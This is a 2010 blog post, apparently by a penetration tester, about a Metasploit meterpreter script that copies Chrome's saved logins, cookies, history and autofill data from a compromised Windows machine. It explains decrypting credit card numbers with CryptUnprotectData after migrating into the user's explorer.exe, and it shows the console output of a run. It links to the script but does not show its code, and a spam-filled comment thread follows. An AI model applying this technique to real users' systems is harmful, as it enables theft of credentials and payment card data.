Monday, September 20, 2010

Meterpreter Script to extract chrome browser data

About two months ago, Jeremiah Grossman found a a nice way to exploit the form autofill feature of the Safari browser to extract the stored data.
A few days later Google announced that Chrome 6 will support form autofill including credit card information.

I was curious how the data is stored and the metasploit project was missing a meterpreter script to extract chrome browser data anyway, so I created one.

The information is stored in sqlite databases and some JSON files. The script downloads these and extracts the useful information from the databases, storing the data in JSON dumps so it is both human readable and easy to parse.

The most sensitive data (auto fill passwords and credit card numbers) is encrypted using the Windows function CryptProtectData:
"Typically, only a user with the same logon credential as the user who encrypted the data can decrypt the data. In addition, the encryption and decryption usually must be done on the same computer."

To decrypt the data, the script calls the CryptUnprotectData function on the target system using the new railgun meterpreter extension.
To make this work, the process on the target system running meterpreter needs to be owned by the user the data belongs to, so this does not work with SYSTEM privileges.
To get the data of the currently logged on user, the script allows to automatically migrate into the exlorer.exe process and, after the decryption is done, back into the original process.

The following shows the console output of the script:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run enum_chrome -m
[*] current PID is 1100. migrating into explorer.exe, PID=2916...
[*] done.
[*] running as user 'VM-WINXP\test'...
[*] extracting data for user 'test'...
[*] downloading file Web Data to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Web Data'...
[*] downloading file Cookies to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Cookies'...
[*] downloading file History to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/History'...
[*] downloading file Login Data to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Login Data'...
[*] downloading file Bookmarks to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Bookmarks'...
[*] downloading file Preferences to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Preferences'...
[*] creating file 'autofill.json'...
[*] creating file 'autofill_profiles.json'...
[*] creating file 'autofill_credit_cards.json'...
[*] decrypting field 'card_number_encrypted'...
[*] creating file 'cookies.json'...
[*] creating file 'history.json'...
[*] creating file 'logins.json'...
[*] creating file 'bookmarks.json'...
[*] creating file 'preferences.json'...
[*] migrating back into PID=1100...
[*] done.
meterpreter >

The file 'autofill_credit_cards.json' contains the following (the field "card_number_encrypted_decrypted" gets added by the script):
[
  {
    "label": "",
    "verification_code_encrypted": "",
    "unique_id": 1,
    "expiration_year": 2010,
    "card_number": "",
    "shipping_address": "",
    "type": "",
    "card_number_encrypted": "\u0001\u0000\u0000\u0000Ð~L~]ß\u0001\u0015Ñ\u0011~Lz\u0000ÀOÂ~Wë\u0001\u0000\u0000\u0000/\u0006E\u000eú«}N~LÁ\u001bjÍ5\u0004~\\u0000\u0000\u0000\u0000\u0002\u0000\u0000\u0000\u0000\u0000\u0003f\u0000\u0000¨\u0000\u0000\u0000\u0010\u0000\u0000\u0000Ú½[~LökºíaÂAÕ\u0013ÖoÚ\u0000\u0000\u0000\u0000\u0004~@\u0000\u0000| \u0000\u0000\u0000\u0010\u0000\u0000\u0000~Eî\\uFÎrgé|i¬.\u0002~P~I\u0018\u0000\u0000\u0000~N£Hvß~FÃÀê%á6h¢Q~Q;j NØ\u0002m±\u0014\u0000\u0000\u0000Yö|#~\~A°µ±ù~Zå·®\u0007éJ~KyÓ",
    "billing_address": "",
    "expiration_month": 12,
    "verification_code": "",
    "name_on_card": "Test Card",
    "card_number_encrypted_decrypted": "0123456789012345"
  }
]


You can download the script here: http://github.com/svent/misc/blob/master/metasploit/enum_chrome.rb

22 comments:

  1. Hi,

    Metasploit v3.4.2 not supported ? Running BackTrack 4. Can you update your script.

    ReplyDelete
    Replies
    1. hi , I want to learn..
      Find out more how to make them.
      Download Song

      Delete
  2. I have bookmarked your blog, the articles are way better than other similar blogs.. thanks for a great blog! Download UC browser mini

    ReplyDelete
  3. Very good points you wrote here..Great stuff...I think you've made some truly interesting points.Keep up the good work. Search Bar Firefox 57 Quantum addon

    ReplyDelete
  4. يتوافر لدي موقع مكتبتك الكثير من الخدمات التقنية العالية في الجودة والتميز منها الترجمة البحثية التي يلجئ اليها الكثير من الباحثين في جميع المراحل التي يمر بها البحث

    ReplyDelete
  5. يتواجد لدي موقع مكتبتك العديد من الانواع المختلفة للتقنيات العالية في الجودة منها المساعدة في اعداد الاطار النظري للبحث مع الحرص علي اظهار شخصية الباحث

    ReplyDelete
  6. يعتبر موقع مكتبتك من أهم المواقع التي تسهم في توفير ترجمة علمية وطبية في كافة المجالات لكي تفتح المجال أمام الباحث العلمي خلال اعداد الاطار النظري للحصول على الترجمة البحثية والعلمية المتخصصة من قبل مجموعة من المتخصصين

    ReplyDelete
  7. If you found any login issues, installation issues, Printing, and PDF-related issues, you can download the Quickbooks tool hub to fix all the issues. This tool is the combination of all the Quickbooks tools in one application to save your time.
    Quickbooks tool hub download

    ReplyDelete
  8. Nice & Informative Blog !
    For managing accounting tasks, you should use QuickBooks accounting software.In case you have faced any technical issues in QuickBooks, call us at QuickBooks Customer Service 1-(855)-729-7482.

    ReplyDelete
  9. common steps on how to How to fix Quickbooks error code 15270 are
    Updating your Quickbooks from main menu option
    Download and install Quickbooks tool hub - it rectifies the update error 15270.

    ReplyDelete
  10. If it is difficult to cope with the task on your own or there is simply not enough time for it, then it is worth ordering a “Do My Essay For Me Uk” task from the best authors of the UK. Such work is more complicated than a simple article since it takes a lot of time and effort to study various materials.

    ReplyDelete
  11. I'm not quite good at coding, nevertheless, this source might be useful for a lot of people or those who start programming. One of my friends worked as a writer at a film review writing service https://mid-terms.com/write-my-movie-review-for-me/ he might be interested in this article as well.

    ReplyDelete
  12. The Industrial Wastewater Treatment Market size is expected to grow from USD 11.3 billion in 2019 to USD 15.0 billion by 2024, at a CAGR of 5.8%. The requirement of a safe working environment in industrial facilities is also boosting the demand for industrial wastewater treatment. Power generation is the largest as well as the fastest-growing end-use industry of industrial wastewater treatment, where clean water is an essential component for electricity generation. The rapidly growing population and urbanization along with changing lifestyle have resulted in increasing per capita power consumption.

    ReplyDelete
  13. Such great content.This is authentic. Are you also searching for nursing writing services login? we are the best solution for you. We are best known for delivering the best

    ReplyDelete
  14. This comment has been removed by the author.

    ReplyDelete
  15. Your blogs are authentic and great. Are you also searching for cheap nursing writing company? we are the best solution for you. We are best known for delivering quality essay writing services to students without having to break the bank

    ReplyDelete